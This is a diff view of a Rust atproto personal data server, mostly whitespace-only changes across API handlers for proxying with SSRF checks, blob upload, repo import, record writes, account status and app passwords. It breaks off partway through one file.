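fn validate_platform(platform: &str) -> Result<(), &'static str> {
    if VALID_PLATFORMS.contains(&platform) {
        Ok(())
    } else {
        Err("platform must be one of: ios, android, web")
    }
}

assert!(validate_platform("ios").is_ok());
assert!(validate_platform("windows").is_err());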
+4
src/api/notification_prefs.rs
···
10
use tracing::info;
11
use crate::auth::validate_bearer_token;
12
use crate::state::AppState;
13
#[derive(Serialize)]
14
#[serde(rename_all = "camelCase")]
15
pub struct NotificationPrefsResponse {
···
22
pub signal_number: Option<String>,
23
pub signal_verified: bool,
24
}
25
pub async fn get_notification_prefs(
26
State(state): State<AppState>,
27
headers: HeaderMap,
···
96
})
97
.into_response()
98
}
99
#[derive(Deserialize)]
100
#[serde(rename_all = "camelCase")]
101
pub struct UpdateNotificationPrefsInput {
···
104
pub telegram_username: Option<String>,
105
pub signal_number: Option<String>,
106
}
107
pub async fn update_notification_prefs(
108
State(state): State<AppState>,
109
headers: HeaderMap,
···
10
use tracing::info;
11
use crate::auth::validate_bearer_token;
12
use crate::state::AppState;
13
+
14
#[derive(Serialize)]
15
#[serde(rename_all = "camelCase")]
16
pub struct NotificationPrefsResponse {
···
23
pub signal_number: Option<String>,
24
pub signal_verified: bool,
25
}
26
+
27
pub async fn get_notification_prefs(
28
State(state): State<AppState>,
29
headers: HeaderMap,
···
98
})
99
.into_response()
100
}
101
+
102
#[derive(Deserialize)]
103
#[serde(rename_all = "camelCase")]
104
pub struct UpdateNotificationPrefsInput {
···
107
pub telegram_username: Option<String>,
108
pub signal_number: Option<String>,
109
}
110
+
111
pub async fn update_notification_prefs(
112
State(state): State<AppState>,
113
headers: HeaderMap,
+1
src/api/proxy.rs
+15
src/api/proxy_client.rs
···
3
use std::sync::OnceLock;
4
use std::time::Duration;
5
use tracing::warn;
6
pub const DEFAULT_HEADERS_TIMEOUT: Duration = Duration::from_secs(10);
7
pub const DEFAULT_BODY_TIMEOUT: Duration = Duration::from_secs(30);
8
pub const DEFAULT_CONNECT_TIMEOUT: Duration = Duration::from_secs(5);
9
pub const MAX_RESPONSE_SIZE: u64 = 10 * 1024 * 1024;
10
static PROXY_CLIENT: OnceLock<Client> = OnceLock::new();
11
pub fn proxy_client() -> &'static Client {
12
PROXY_CLIENT.get_or_init(|| {
13
ClientBuilder::new()
···
20
.expect("Failed to build HTTP client - this indicates a TLS or system configuration issue")
21
})
22
}
23
pub fn is_ssrf_safe(url: &str) -> Result<(), SsrfError> {
24
let parsed = Url::parse(url).map_err(|_| SsrfError::InvalidUrl)?;
25
let scheme = parsed.scheme();
···
61
}
62
Ok(())
63
}
64
fn is_unicast_ip(ip: &IpAddr) -> bool {
65
match ip {
66
IpAddr::V4(v4) => {
···
74
IpAddr::V6(v6) => !v6.is_loopback() && !v6.is_multicast() && !v6.is_unspecified(),
75
}
76
}
77
fn is_private_v4(ip: &std::net::Ipv4Addr) -> bool {
78
let octets = ip.octets();
79
octets[0] == 10
···
81
|| (octets[0] == 192 && octets[1] == 168)
82
|| (octets[0] == 169 && octets[1] == 254)
83
}
84
#[derive(Debug, Clone)]
85
pub enum SsrfError {
86
InvalidUrl,
···
89
NonUnicastIp(String),
90
DnsResolutionFailed(String),
91
}
92
impl std::fmt::Display for SsrfError {
93
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
94
match self {
···
100
}
101
}
102
}
103
impl std::error::Error for SsrfError {}
104
pub const HEADERS_TO_FORWARD: &[&str] = &[
105
"accept-language",
106
"atproto-accept-labelers",
···
112
"retry-after",
113
"content-type",
114
];
115
pub fn validate_at_uri(uri: &str) -> Result<AtUriParts, &'static str> {
116
if !uri.starts_with("at://") {
117
return Err("URI must start with at://");
···
137
rkey: parts.get(2).map(|s| s.to_string()),
138
})
139
}
140
#[derive(Debug, Clone)]
141
pub struct AtUriParts {
142
pub did: String,
143
pub collection: Option<String>,
144
pub rkey: Option<String>,
145
}
146
pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 {
147
match limit {
148
Some(l) if l == 0 => default,
···
151
None => default,
152
}
153
}
154
pub fn validate_did(did: &str) -> Result<(), &'static str> {
155
if !did.starts_with("did:") {
156
return Err("Invalid DID format");
···
165
}
166
Ok(())
167
}
168
#[cfg(test)]
169
mod tests {
170
use super::*;
···
3
use std::sync::OnceLock;
4
use std::time::Duration;
5
use tracing::warn;
6
+
7
pub const DEFAULT_HEADERS_TIMEOUT: Duration = Duration::from_secs(10);
8
pub const DEFAULT_BODY_TIMEOUT: Duration = Duration::from_secs(30);
9
pub const DEFAULT_CONNECT_TIMEOUT: Duration = Duration::from_secs(5);
10
pub const MAX_RESPONSE_SIZE: u64 = 10 * 1024 * 1024;
11
+
12
static PROXY_CLIENT: OnceLock<Client> = OnceLock::new();
13
+
14
pub fn proxy_client() -> &'static Client {
15
PROXY_CLIENT.get_or_init(|| {
16
ClientBuilder::new()
···
23
.expect("Failed to build HTTP client - this indicates a TLS or system configuration issue")
24
})
25
}
26
+
27
pub fn is_ssrf_safe(url: &str) -> Result<(), SsrfError> {
28
let parsed = Url::parse(url).map_err(|_| SsrfError::InvalidUrl)?;
29
let scheme = parsed.scheme();
···
65
}
66
Ok(())
67
}
68
+
69
fn is_unicast_ip(ip: &IpAddr) -> bool {
70
match ip {
71
IpAddr::V4(v4) => {
···
79
IpAddr::V6(v6) => !v6.is_loopback() && !v6.is_multicast() && !v6.is_unspecified(),
80
}
81
}
82
+
83
fn is_private_v4(ip: &std::net::Ipv4Addr) -> bool {
84
let octets = ip.octets();
85
octets[0] == 10
···
87
|| (octets[0] == 192 && octets[1] == 168)
88
|| (octets[0] == 169 && octets[1] == 254)
89
}
90
+
91
#[derive(Debug, Clone)]
92
pub enum SsrfError {
93
InvalidUrl,
···
96
NonUnicastIp(String),
97
DnsResolutionFailed(String),
98
}
99
+
100
impl std::fmt::Display for SsrfError {
101
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
102
match self {
···
108
}
109
}
110
}
111
+
112
impl std::error::Error for SsrfError {}
113
+
114
pub const HEADERS_TO_FORWARD: &[&str] = &[
115
"accept-language",
116
"atproto-accept-labelers",
···
122
"retry-after",
123
"content-type",
124
];
125
+
126
pub fn validate_at_uri(uri: &str) -> Result<AtUriParts, &'static str> {
127
if !uri.starts_with("at://") {
128
return Err("URI must start with at://");
···
148
rkey: parts.get(2).map(|s| s.to_string()),
149
})
150
}
151
+
152
#[derive(Debug, Clone)]
153
pub struct AtUriParts {
154
pub did: String,
155
pub collection: Option<String>,
156
pub rkey: Option<String>,
157
}
158
+
159
pub fn validate_limit(limit: Option<u32>, default: u32, max: u32) -> u32 {
160
match limit {
161
Some(l) if l == 0 => default,
···
164
None => default,
165
}
166
}
167
+
168
pub fn validate_did(did: &str) -> Result<(), &'static str> {
169
if !did.starts_with("did:") {
170
return Err("Invalid DID format");
···
179
}
180
Ok(())
181
}
182
+
183
#[cfg(test)]
184
mod tests {
185
use super::*;
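The helpers in this file are pure functions and easy to exercise directly. A usage sketch covering only the behavior visible in this hunk (the clamping of limits above max is folded and not asserted; the at:// URI is illustrative):

// validate_limit: None and Some(0) both fall back to the default.
assert_eq!(validate_limit(None, 50, 100), 50);
assert_eq!(validate_limit(Some(0), 50, 100), 50);

// validate_at_uri: "at://<did>/<collection>/<rkey>" splits into AtUriParts.
let parts = validate_at_uri("at://did:plc:ewvi7nxzyoun6zhxrhs64oiz/app.bsky.feed.post/3kxyzabc123")
    .expect("well-formed at:// URI");
assert_eq!(parts.did, "did:plc:ewvi7nxzyoun6zhxrhs64oiz");
assert_eq!(parts.collection.as_deref(), Some("app.bsky.feed.post"));
assert_eq!(parts.rkey.as_deref(), Some("3kxyzabc123"));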
+19
src/api/read_after_write.rs
···
17
use std::collections::HashMap;
18
use tracing::{error, info, warn};
19
use uuid::Uuid;
20
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
21
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
22
#[derive(Debug, Clone, Serialize, Deserialize)]
23
#[serde(rename_all = "camelCase")]
24
pub struct PostRecord {
···
39
#[serde(flatten)]
40
pub extra: HashMap<String, Value>,
41
}
42
#[derive(Debug, Clone, Serialize, Deserialize)]
43
#[serde(rename_all = "camelCase")]
44
pub struct ProfileRecord {
···
55
#[serde(flatten)]
56
pub extra: HashMap<String, Value>,
57
}
58
#[derive(Debug, Clone)]
59
pub struct RecordDescript<T> {
60
pub uri: String,
···
62
pub indexed_at: DateTime<Utc>,
63
pub record: T,
64
}
65
#[derive(Debug, Clone, Serialize, Deserialize)]
66
#[serde(rename_all = "camelCase")]
67
pub struct LikeRecord {
···
72
#[serde(flatten)]
73
pub extra: HashMap<String, Value>,
74
}
75
#[derive(Debug, Clone, Serialize, Deserialize)]
76
#[serde(rename_all = "camelCase")]
77
pub struct LikeSubject {
78
pub uri: String,
79
pub cid: String,
80
}
81
#[derive(Debug, Default)]
82
pub struct LocalRecords {
83
pub count: usize,
···
85
pub posts: Vec<RecordDescript<PostRecord>>,
86
pub likes: Vec<RecordDescript<LikeRecord>>,
87
}
88
pub async fn get_records_since_rev(
89
state: &AppState,
90
did: &str,
···
187
}
188
Ok(result)
189
}
190
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
191
let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at);
192
for post in &local.posts {
···
205
}
206
oldest.map(|o| (Utc::now() - o).num_milliseconds())
207
}
208
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
209
headers
210
.get(REPO_REV_HEADER)
211
.and_then(|h| h.to_str().ok())
212
.map(|s| s.to_string())
213
}
214
#[derive(Debug)]
215
pub struct ProxyResponse {
216
pub status: StatusCode,
217
pub headers: HeaderMap,
218
pub body: bytes::Bytes,
219
}
220
pub async fn proxy_to_appview(
221
method: &str,
222
params: &HashMap<String, String>,
···
297
}
298
}
299
}
300
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
301
let mut response = (StatusCode::OK, Json(data)).into_response();
302
if let Some(lag_ms) = lag {
···
308
}
309
response
310
}
311
#[derive(Debug, Clone, Serialize, Deserialize)]
312
#[serde(rename_all = "camelCase")]
313
pub struct AuthorView {
···
320
#[serde(flatten)]
321
pub extra: HashMap<String, Value>,
322
}
323
#[derive(Debug, Clone, Serialize, Deserialize)]
324
#[serde(rename_all = "camelCase")]
325
pub struct PostView {
···
341
#[serde(flatten)]
342
pub extra: HashMap<String, Value>,
343
}
344
#[derive(Debug, Clone, Serialize, Deserialize)]
345
#[serde(rename_all = "camelCase")]
346
pub struct FeedViewPost {
···
354
#[serde(flatten)]
355
pub extra: HashMap<String, Value>,
356
}
357
#[derive(Debug, Clone, Serialize, Deserialize)]
358
pub struct FeedOutput {
359
pub feed: Vec<FeedViewPost>,
360
#[serde(skip_serializing_if = "Option::is_none")]
361
pub cursor: Option<String>,
362
}
363
pub fn format_local_post(
364
descript: &RecordDescript<PostRecord>,
365
author_did: &str,
···
387
extra: HashMap::new(),
388
}
389
}
390
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
391
if posts.is_empty() {
392
return;
···
17
use std::collections::HashMap;
18
use tracing::{error, info, warn};
19
use uuid::Uuid;
20
+
21
pub const REPO_REV_HEADER: &str = "atproto-repo-rev";
22
pub const UPSTREAM_LAG_HEADER: &str = "atproto-upstream-lag";
23
+
24
#[derive(Debug, Clone, Serialize, Deserialize)]
25
#[serde(rename_all = "camelCase")]
26
pub struct PostRecord {
···
41
#[serde(flatten)]
42
pub extra: HashMap<String, Value>,
43
}
44
+
45
#[derive(Debug, Clone, Serialize, Deserialize)]
46
#[serde(rename_all = "camelCase")]
47
pub struct ProfileRecord {
···
58
#[serde(flatten)]
59
pub extra: HashMap<String, Value>,
60
}
61
+
62
#[derive(Debug, Clone)]
63
pub struct RecordDescript<T> {
64
pub uri: String,
···
66
pub indexed_at: DateTime<Utc>,
67
pub record: T,
68
}
69
+
70
#[derive(Debug, Clone, Serialize, Deserialize)]
71
#[serde(rename_all = "camelCase")]
72
pub struct LikeRecord {
···
77
#[serde(flatten)]
78
pub extra: HashMap<String, Value>,
79
}
80
+
81
#[derive(Debug, Clone, Serialize, Deserialize)]
82
#[serde(rename_all = "camelCase")]
83
pub struct LikeSubject {
84
pub uri: String,
85
pub cid: String,
86
}
87
+
88
#[derive(Debug, Default)]
89
pub struct LocalRecords {
90
pub count: usize,
···
92
pub posts: Vec<RecordDescript<PostRecord>>,
93
pub likes: Vec<RecordDescript<LikeRecord>>,
94
}
95
+
96
pub async fn get_records_since_rev(
97
state: &AppState,
98
did: &str,
···
195
}
196
Ok(result)
197
}
198
+
199
pub fn get_local_lag(local: &LocalRecords) -> Option<i64> {
200
let mut oldest: Option<DateTime<Utc>> = local.profile.as_ref().map(|p| p.indexed_at);
201
for post in &local.posts {
···
214
}
215
oldest.map(|o| (Utc::now() - o).num_milliseconds())
216
}
217
+
218
pub fn extract_repo_rev(headers: &HeaderMap) -> Option<String> {
219
headers
220
.get(REPO_REV_HEADER)
221
.and_then(|h| h.to_str().ok())
222
.map(|s| s.to_string())
223
}
224
+
225
#[derive(Debug)]
226
pub struct ProxyResponse {
227
pub status: StatusCode,
228
pub headers: HeaderMap,
229
pub body: bytes::Bytes,
230
}
231
+
232
pub async fn proxy_to_appview(
233
method: &str,
234
params: &HashMap<String, String>,
···
309
}
310
}
311
}
312
+
313
pub fn format_munged_response<T: Serialize>(data: T, lag: Option<i64>) -> Response {
314
let mut response = (StatusCode::OK, Json(data)).into_response();
315
if let Some(lag_ms) = lag {
···
321
}
322
response
323
}
324
+
325
#[derive(Debug, Clone, Serialize, Deserialize)]
326
#[serde(rename_all = "camelCase")]
327
pub struct AuthorView {
···
334
#[serde(flatten)]
335
pub extra: HashMap<String, Value>,
336
}
337
+
338
#[derive(Debug, Clone, Serialize, Deserialize)]
339
#[serde(rename_all = "camelCase")]
340
pub struct PostView {
···
356
#[serde(flatten)]
357
pub extra: HashMap<String, Value>,
358
}
359
+
360
#[derive(Debug, Clone, Serialize, Deserialize)]
361
#[serde(rename_all = "camelCase")]
362
pub struct FeedViewPost {
···
370
#[serde(flatten)]
371
pub extra: HashMap<String, Value>,
372
}
373
+
374
#[derive(Debug, Clone, Serialize, Deserialize)]
375
pub struct FeedOutput {
376
pub feed: Vec<FeedViewPost>,
377
#[serde(skip_serializing_if = "Option::is_none")]
378
pub cursor: Option<String>,
379
}
380
+
381
pub fn format_local_post(
382
descript: &RecordDescript<PostRecord>,
383
author_did: &str,
···
405
extra: HashMap::new(),
406
}
407
}
408
+
409
pub fn insert_posts_into_feed(feed: &mut Vec<FeedViewPost>, posts: Vec<PostView>) {
410
if posts.is_empty() {
411
return;
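extract_repo_rev is small and self-contained: it reads the atproto-repo-rev header as an owned String. A usage sketch for the helper defined above (the rev value is illustrative):

use axum::http::{HeaderMap, HeaderValue};

// Present header -> Some(rev); absent header -> None.
let mut headers = HeaderMap::new();
headers.insert(REPO_REV_HEADER, HeaderValue::from_static("3kabc123xyz"));
assert_eq!(extract_repo_rev(&headers).as_deref(), Some("3kabc123xyz"));
assert_eq!(extract_repo_rev(&HeaderMap::new()), None);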
+7
src/api/repo/blob.rs
···
14
use sha2::{Digest, Sha256};
15
use std::str::FromStr;
16
use tracing::error;
17
const MAX_BLOB_SIZE: usize = 1_000_000;
18
pub async fn upload_blob(
19
State(state): State<AppState>,
20
headers: axum::http::HeaderMap,
···
154
}))
155
.into_response()
156
}
157
#[derive(Deserialize)]
158
pub struct ListMissingBlobsParams {
159
pub limit: Option<i64>,
160
pub cursor: Option<String>,
161
}
162
#[derive(Serialize)]
163
#[serde(rename_all = "camelCase")]
164
pub struct RecordBlob {
165
pub cid: String,
166
pub record_uri: String,
167
}
168
#[derive(Serialize)]
169
pub struct ListMissingBlobsOutput {
170
pub cursor: Option<String>,
171
pub blobs: Vec<RecordBlob>,
172
}
173
fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) {
174
if let Some(obj) = val.as_object() {
175
if let Some(type_val) = obj.get("$type") {
···
192
}
193
}
194
}
195
pub async fn list_missing_blobs(
196
State(state): State<AppState>,
197
headers: axum::http::HeaderMap,
···
14
use sha2::{Digest, Sha256};
15
use std::str::FromStr;
16
use tracing::error;
17
+
18
const MAX_BLOB_SIZE: usize = 1_000_000;
19
+
20
pub async fn upload_blob(
21
State(state): State<AppState>,
22
headers: axum::http::HeaderMap,
···
156
}))
157
.into_response()
158
}
159
+
160
#[derive(Deserialize)]
161
pub struct ListMissingBlobsParams {
162
pub limit: Option<i64>,
163
pub cursor: Option<String>,
164
}
165
+
166
#[derive(Serialize)]
167
#[serde(rename_all = "camelCase")]
168
pub struct RecordBlob {
169
pub cid: String,
170
pub record_uri: String,
171
}
172
+
173
#[derive(Serialize)]
174
pub struct ListMissingBlobsOutput {
175
pub cursor: Option<String>,
176
pub blobs: Vec<RecordBlob>,
177
}
178
+
179
fn find_blobs(val: &serde_json::Value, blobs: &mut Vec<String>) {
180
if let Some(obj) = val.as_object() {
181
if let Some(type_val) = obj.get("$type") {
···
198
}
199
}
200
}
201
+
202
pub async fn list_missing_blobs(
203
State(state): State<AppState>,
204
headers: axum::http::HeaderMap,
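find_blobs walks record JSON looking for blob references; its body is mostly folded above, so the following is an assumed sketch of the general shape such a walker takes, not the exact implementation:

use serde_json::Value;

// Assumed sketch: collect the CID link of every {"$type": "blob", "ref": {"$link": ...}} node.
fn collect_blob_refs(val: &Value, out: &mut Vec<String>) {
    match val {
        Value::Object(obj) => {
            if obj.get("$type").and_then(Value::as_str) == Some("blob") {
                if let Some(link) = obj
                    .get("ref")
                    .and_then(|r| r.get("$link"))
                    .and_then(Value::as_str)
                {
                    out.push(link.to_string());
                }
            }
            for v in obj.values() {
                collect_blob_refs(v, out);
            }
        }
        Value::Array(arr) => arr.iter().for_each(|v| collect_blob_refs(v, out)),
        _ => {}
    }
}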
+3
src/api/repo/import.rs
···
11
};
12
use serde_json::json;
13
use tracing::{debug, error, info, warn};
14
const DEFAULT_MAX_IMPORT_SIZE: usize = 100 * 1024 * 1024;
15
const DEFAULT_MAX_BLOCKS: usize = 50000;
16
pub async fn import_repo(
17
State(state): State<AppState>,
18
headers: axum::http::HeaderMap,
···
355
}
356
}
357
}
358
async fn sequence_import_event(
359
state: &AppState,
360
did: &str,
···
11
};
12
use serde_json::json;
13
use tracing::{debug, error, info, warn};
14
+
15
const DEFAULT_MAX_IMPORT_SIZE: usize = 100 * 1024 * 1024;
16
const DEFAULT_MAX_BLOCKS: usize = 50000;
17
+
18
pub async fn import_repo(
19
State(state): State<AppState>,
20
headers: axum::http::HeaderMap,
···
357
}
358
}
359
}
360
+
361
async fn sequence_import_event(
362
state: &AppState,
363
did: &str,
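import_repo enforces the two limits defined at the top of this file; a sketch of the guard they imply (the helper name and error strings are illustrative, the handler's real error shape is not visible in this hunk):

// Illustrative guard using DEFAULT_MAX_IMPORT_SIZE (100 MiB) and DEFAULT_MAX_BLOCKS (50_000).
fn check_import_limits(car_bytes: usize, block_count: usize) -> Result<(), &'static str> {
    if car_bytes > DEFAULT_MAX_IMPORT_SIZE {
        return Err("CAR file exceeds the maximum import size");
    }
    if block_count > DEFAULT_MAX_BLOCKS {
        return Err("CAR file contains too many blocks");
    }
    Ok(())
}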
+2
src/api/repo/meta.rs
+1
src/api/repo/mod.rs
+7
src/api/repo/record/batch.rs
···
17
use std::str::FromStr;
18
use std::sync::Arc;
19
use tracing::error;
20
const MAX_BATCH_WRITES: usize = 200;
21
#[derive(Deserialize)]
22
#[serde(tag = "$type")]
23
pub enum WriteOp {
···
36
#[serde(rename = "com.atproto.repo.applyWrites#delete")]
37
Delete { collection: String, rkey: String },
38
}
39
#[derive(Deserialize)]
40
#[serde(rename_all = "camelCase")]
41
pub struct ApplyWritesInput {
···
44
pub writes: Vec<WriteOp>,
45
pub swap_commit: Option<String>,
46
}
47
#[derive(Serialize)]
48
#[serde(tag = "$type")]
49
pub enum WriteResult {
···
54
#[serde(rename = "com.atproto.repo.applyWrites#deleteResult")]
55
DeleteResult {},
56
}
57
#[derive(Serialize)]
58
pub struct ApplyWritesOutput {
59
pub commit: CommitInfo,
60
pub results: Vec<WriteResult>,
61
}
62
#[derive(Serialize)]
63
pub struct CommitInfo {
64
pub cid: String,
65
pub rev: String,
66
}
67
pub async fn apply_writes(
68
State(state): State<AppState>,
69
headers: axum::http::HeaderMap,
···
17
use std::str::FromStr;
18
use std::sync::Arc;
19
use tracing::error;
20
+
21
const MAX_BATCH_WRITES: usize = 200;
22
+
23
#[derive(Deserialize)]
24
#[serde(tag = "$type")]
25
pub enum WriteOp {
···
38
#[serde(rename = "com.atproto.repo.applyWrites#delete")]
39
Delete { collection: String, rkey: String },
40
}
41
+
42
#[derive(Deserialize)]
43
#[serde(rename_all = "camelCase")]
44
pub struct ApplyWritesInput {
···
47
pub writes: Vec<WriteOp>,
48
pub swap_commit: Option<String>,
49
}
50
+
51
#[derive(Serialize)]
52
#[serde(tag = "$type")]
53
pub enum WriteResult {
···
58
#[serde(rename = "com.atproto.repo.applyWrites#deleteResult")]
59
DeleteResult {},
60
}
61
+
62
#[derive(Serialize)]
63
pub struct ApplyWritesOutput {
64
pub commit: CommitInfo,
65
pub results: Vec<WriteResult>,
66
}
67
+
68
#[derive(Serialize)]
69
pub struct CommitInfo {
70
pub cid: String,
71
pub rev: String,
72
}
73
+
74
pub async fn apply_writes(
75
State(state): State<AppState>,
76
headers: axum::http::HeaderMap,
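WriteOp is internally tagged on "$type", so each write in an applyWrites request carries its lexicon identifier. A sketch deserializing the delete variant, the one fully visible in this hunk (values are illustrative):

use serde_json::json;

// The "$type" tag selects the enum variant; collection/rkey fill its fields.
let op: WriteOp = serde_json::from_value(json!({
    "$type": "com.atproto.repo.applyWrites#delete",
    "collection": "app.bsky.feed.post",
    "rkey": "3kxyzabc123"
}))
.expect("valid delete write");
match op {
    WriteOp::Delete { collection, rkey } => {
        assert_eq!(collection, "app.bsky.feed.post");
        assert_eq!(rkey, "3kxyzabc123");
    }
    _ => unreachable!("only the delete variant is constructed here"),
}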
+2
src/api/repo/record/delete.rs
···
16
use std::str::FromStr;
17
use std::sync::Arc;
18
use tracing::error;
19
#[derive(Deserialize)]
20
pub struct DeleteRecordInput {
21
pub repo: String,
···
26
#[serde(rename = "swapCommit")]
27
pub swap_commit: Option<String>,
28
}
29
pub async fn delete_record(
30
State(state): State<AppState>,
31
headers: HeaderMap,
···
16
use std::str::FromStr;
17
use std::sync::Arc;
18
use tracing::error;
19
+
20
#[derive(Deserialize)]
21
pub struct DeleteRecordInput {
22
pub repo: String,
···
27
#[serde(rename = "swapCommit")]
28
pub swap_commit: Option<String>,
29
}
30
+
31
pub async fn delete_record(
32
State(state): State<AppState>,
33
headers: HeaderMap,
+1
src/api/repo/record/mod.rs
+2
src/api/repo/record/read.rs
···
12
use std::collections::HashMap;
13
use std::str::FromStr;
14
use tracing::error;
15
#[derive(Deserialize)]
16
pub struct GetRecordInput {
17
pub repo: String,
···
19
pub rkey: String,
20
pub cid: Option<String>,
21
}
22
pub async fn get_record(
23
State(state): State<AppState>,
24
Query(input): Query<GetRecordInput>,
···
12
use std::collections::HashMap;
13
use std::str::FromStr;
14
use tracing::error;
15
+
16
#[derive(Deserialize)]
17
pub struct GetRecordInput {
18
pub repo: String,
···
20
pub rkey: String,
21
pub cid: Option<String>,
22
}
23
+
24
pub async fn get_record(
25
State(state): State<AppState>,
26
Query(input): Query<GetRecordInput>,
+4
src/api/repo/record/utils.rs
···
28
rev: &'a str,
29
version: i64,
30
}
31
fn create_signed_commit(
32
did: &str,
33
data: Cid,
···
68
.map_err(|e| format!("Failed to serialize signed commit: {:?}", e))?;
69
Ok((signed_bytes, sig_bytes))
70
}
71
pub enum RecordOp {
72
Create { collection: String, rkey: String, cid: Cid },
73
Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> },
74
Delete { collection: String, rkey: String, prev: Option<Cid> },
75
}
76
pub struct CommitResult {
77
pub commit_cid: Cid,
78
pub rev: String,
79
}
80
pub async fn commit_and_log(
81
state: &AppState,
82
did: &str,
···
28
rev: &'a str,
29
version: i64,
30
}
31
+
32
fn create_signed_commit(
33
did: &str,
34
data: Cid,
···
69
.map_err(|e| format!("Failed to serialize signed commit: {:?}", e))?;
70
Ok((signed_bytes, sig_bytes))
71
}
72
+
73
pub enum RecordOp {
74
Create { collection: String, rkey: String, cid: Cid },
75
Update { collection: String, rkey: String, cid: Cid, prev: Option<Cid> },
76
Delete { collection: String, rkey: String, prev: Option<Cid> },
77
}
78
+
79
pub struct CommitResult {
80
pub commit_cid: Cid,
81
pub rev: String,
82
}
83
+
84
pub async fn commit_and_log(
85
state: &AppState,
86
did: &str,
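RecordOp is the per-record unit handed to commit_and_log; whichever variant it is, it addresses a single "collection/rkey" path in the repo. An assumed sketch of that mapping (the helper is illustrative, not part of this diff):

// Assumed: every RecordOp variant targets the repo key "<collection>/<rkey>".
fn record_path(op: &RecordOp) -> String {
    match op {
        RecordOp::Create { collection, rkey, .. }
        | RecordOp::Update { collection, rkey, .. }
        | RecordOp::Delete { collection, rkey, .. } => format!("{}/{}", collection, rkey),
    }
}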
+1
src/api/repo/record/validation.rs
+2
src/api/repo/record/write.rs
···
18
use std::sync::Arc;
19
use tracing::error;
20
use uuid::Uuid;
21
pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> {
22
let row = sqlx::query(
23
r#"
···
44
None => Ok(false),
45
}
46
}
47
pub async fn prepare_repo_write(
48
state: &AppState,
49
headers: &HeaderMap,
···
18
use std::sync::Arc;
19
use tracing::error;
20
use uuid::Uuid;
21
+
22
pub async fn has_verified_notification_channel(db: &PgPool, did: &str) -> Result<bool, sqlx::Error> {
23
let row = sqlx::query(
24
r#"
···
45
None => Ok(false),
46
}
47
}
48
+
49
pub async fn prepare_repo_write(
50
state: &AppState,
51
headers: &HeaderMap,
+8
src/api/server/account_status.rs
···
12
use serde_json::json;
13
use tracing::{error, info, warn};
14
use uuid::Uuid;
15
#[derive(Serialize)]
16
#[serde(rename_all = "camelCase")]
17
pub struct CheckAccountStatusOutput {
···
25
pub expected_blobs: i64,
26
pub imported_blobs: i64,
27
}
28
pub async fn check_account_status(
29
State(state): State<AppState>,
30
headers: axum::http::HeaderMap,
···
94
)
95
.into_response()
96
}
97
pub async fn activate_account(
98
State(state): State<AppState>,
99
headers: axum::http::HeaderMap,
···
133
}
134
}
135
}
136
#[derive(Deserialize)]
137
#[serde(rename_all = "camelCase")]
138
pub struct DeactivateAccountInput {
139
pub delete_after: Option<String>,
140
}
141
pub async fn deactivate_account(
142
State(state): State<AppState>,
143
headers: axum::http::HeaderMap,
···
178
}
179
}
180
}
181
pub async fn request_account_delete(
182
State(state): State<AppState>,
183
headers: axum::http::HeaderMap,
···
232
info!("Account deletion requested for user {}", did);
233
(StatusCode::OK, Json(json!({}))).into_response()
234
}
235
#[derive(Deserialize)]
236
pub struct DeleteAccountInput {
237
pub did: String,
238
pub password: String,
239
pub token: String,
240
}
241
pub async fn delete_account(
242
State(state): State<AppState>,
243
Json(input): Json<DeleteAccountInput>,
···
12
use serde_json::json;
13
use tracing::{error, info, warn};
14
use uuid::Uuid;
15
+
16
#[derive(Serialize)]
17
#[serde(rename_all = "camelCase")]
18
pub struct CheckAccountStatusOutput {
···
26
pub expected_blobs: i64,
27
pub imported_blobs: i64,
28
}
29
+
30
pub async fn check_account_status(
31
State(state): State<AppState>,
32
headers: axum::http::HeaderMap,
···
96
)
97
.into_response()
98
}
99
+
100
pub async fn activate_account(
101
State(state): State<AppState>,
102
headers: axum::http::HeaderMap,
···
136
}
137
}
138
}
139
+
140
#[derive(Deserialize)]
141
#[serde(rename_all = "camelCase")]
142
pub struct DeactivateAccountInput {
143
pub delete_after: Option<String>,
144
}
145
+
146
pub async fn deactivate_account(
147
State(state): State<AppState>,
148
headers: axum::http::HeaderMap,
···
183
}
184
}
185
}
186
+
187
pub async fn request_account_delete(
188
State(state): State<AppState>,
189
headers: axum::http::HeaderMap,
···
238
info!("Account deletion requested for user {}", did);
239
(StatusCode::OK, Json(json!({}))).into_response()
240
}
241
+
242
#[derive(Deserialize)]
243
pub struct DeleteAccountInput {
244
pub did: String,
245
pub password: String,
246
pub token: String,
247
}
248
+
249
pub async fn delete_account(
250
State(state): State<AppState>,
251
Json(input): Json<DeleteAccountInput>,
+8
src/api/server/app_password.rs
···
11
use serde::{Deserialize, Serialize};
12
use serde_json::json;
13
use tracing::{error, warn};
14
#[derive(Serialize)]
15
#[serde(rename_all = "camelCase")]
16
pub struct AppPassword {
···
18
pub created_at: String,
19
pub privileged: bool,
20
}
21
#[derive(Serialize)]
22
pub struct ListAppPasswordsOutput {
23
pub passwords: Vec<AppPassword>,
24
}
25
pub async fn list_app_passwords(
26
State(state): State<AppState>,
27
BearerAuth(auth_user): BearerAuth,
···
54
}
55
}
56
}
57
#[derive(Deserialize)]
58
pub struct CreateAppPasswordInput {
59
pub name: String,
60
pub privileged: Option<bool>,
61
}
62
#[derive(Serialize)]
63
#[serde(rename_all = "camelCase")]
64
pub struct CreateAppPasswordOutput {
···
67
pub created_at: String,
68
pub privileged: bool,
69
}
70
pub async fn create_app_password(
71
State(state): State<AppState>,
72
headers: HeaderMap,
···
146
}
147
}
148
}
149
#[derive(Deserialize)]
150
pub struct RevokeAppPasswordInput {
151
pub name: String,
152
}
153
pub async fn revoke_app_password(
154
State(state): State<AppState>,
155
BearerAuth(auth_user): BearerAuth,
···
11
use serde::{Deserialize, Serialize};
12
use serde_json::json;
13
use tracing::{error, warn};
14
+
15
#[derive(Serialize)]
16
